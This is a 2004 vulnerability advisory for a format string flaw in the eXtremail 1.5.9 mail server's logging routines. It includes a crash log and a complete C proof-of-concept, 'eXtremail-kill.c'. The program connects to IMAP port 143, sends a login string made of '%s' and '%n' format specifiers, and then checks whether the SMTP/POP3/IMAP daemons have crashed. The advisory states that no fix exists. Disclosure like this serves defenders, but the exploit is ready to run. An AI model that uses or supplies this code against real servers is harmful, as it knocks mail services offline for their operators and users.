Package: eXtremail Auth: http://www.extremail.com/ Version(s): 1.5.9 (current release) Vulnerability: Format String What?s eXtremail: eXtremail is a Unix mail server that supports SMTP/POP3/IMAP protocols. It includes support for virtual domains, spoofing attack ,SSL connection and Antivirus checking. Vulnerability Description: Format string vulnerabilities exist in the logging routines of eXtremail, allowing remote attackers to gain root privileges. This security flaw can be exploited by supplying a specially crafted string containing format specifiers to various SMTP,POP and IMAP commands. The vulnerability has been reported to affect some previous versions (BugTraq ID: 2908), has been reintroduced in latest version of eXtremail. Here is a snippet of eXtremail's log: 25/04/2004 - 16:26:29 -> ---------------------------------------------- 25/04/2004 - 16:26:29 -> - IMAP - Incoming IMAP connection - 25/04/2004 - 16:26:29 -> ---------------------------------------------- 25/04/2004 - 16:26:29 -> IMAP - IMAP connection: 192.168.0.150 25/04/2004 - 16:26:29 -> IMAP - Error: User %s25/04/2004 - 16:26:29 -> SIGN - Signal: segmentation fault received 25/04/2004 - 16:26:29 -> SIGN - Signal: segmentation fault received After a successful denial of service attack, eXtremail must be restarted to regain its functionality (Smptd,Pop3d,Imapd,Remt). Proof of Concept: ------ eXtremail-kill.c -------- /********************************************** * Proof of Concept * * eXtremail 1.5.x Denial of Service * * * * Luca Ercoli <luca.e [at] seeweb.com> * * Seeweb http://www.seeweb.com * * * ***********************************************/ #include <stdio.h> #include <netdb.h> #include <sys/types.h> #include <netinet/in.h> #include <sys/socket.h> #define PORT 143 #define MAXRECVSIZE 100 int main(int argc, char *argv[]); void crash(char *host,int TYPE); int numbytes; void crash(char *host,int TYPE) { int sockfd; char buf[MAXRECVSIZE]; struct hostent *he; struct sockaddr_in their_addr; char poc[]="1 login %s%s%s%s%s%s%s%s%s %s%s%s%s%s%s%s%s%n%n%n\n"; if ((he=gethostbyname(host)) == NULL) { perror("gethostbyname"); exit(1); } if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket"); exit(1); } their_addr.sin_family = AF_INET; their_addr.sin_port = htons(PORT); their_addr.sin_addr = *((struct in_addr *)he->h_addr); memset(&(their_addr.sin_zero), '\0', 8); if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) { perror("connect"); exit(1); } if ((numbytes=recv(sockfd, buf, MAXRECVSIZE-1, 0)) == -1) { perror("recv"); exit(1); } buf[numbytes] = '\0'; if (TYPE == 0) { printf("[+] Server -> %s",buf); sleep(1); printf("\n[!] Sending malicious packet...\n"); send(sockfd,poc, strlen(poc), 0); sleep(1); printf ("\n[+] Sent!\n"); } close(sockfd); } int main(int argc, char *argv[]) { printf("\n\n eXtremail 1.5.x Denial of Service \n"); printf("by Luca Ercoli <luca.e [at] seeweb.com>\n\n\n\n"); if (argc != 2) { fprintf(stderr,"\nUsage -> %s hostname\n\n",argv[0]); exit(1); } crash(argv[1],0); numbytes=0; printf ("\n[+] Checking server status ...\n"); if(!fork()) crash(argv[1],1); sleep(5); if (numbytes == 0) printf ("\n[!] Smtpd/Pop3d/Imapd/Remt crashed!\n\n\n"); return 0; } ------------------------------- Solution: No solution available at the moment. Credits: -- Luca Ercoli <luca.e [at] seeweb.com> Seeweb http://www.seeweb.com
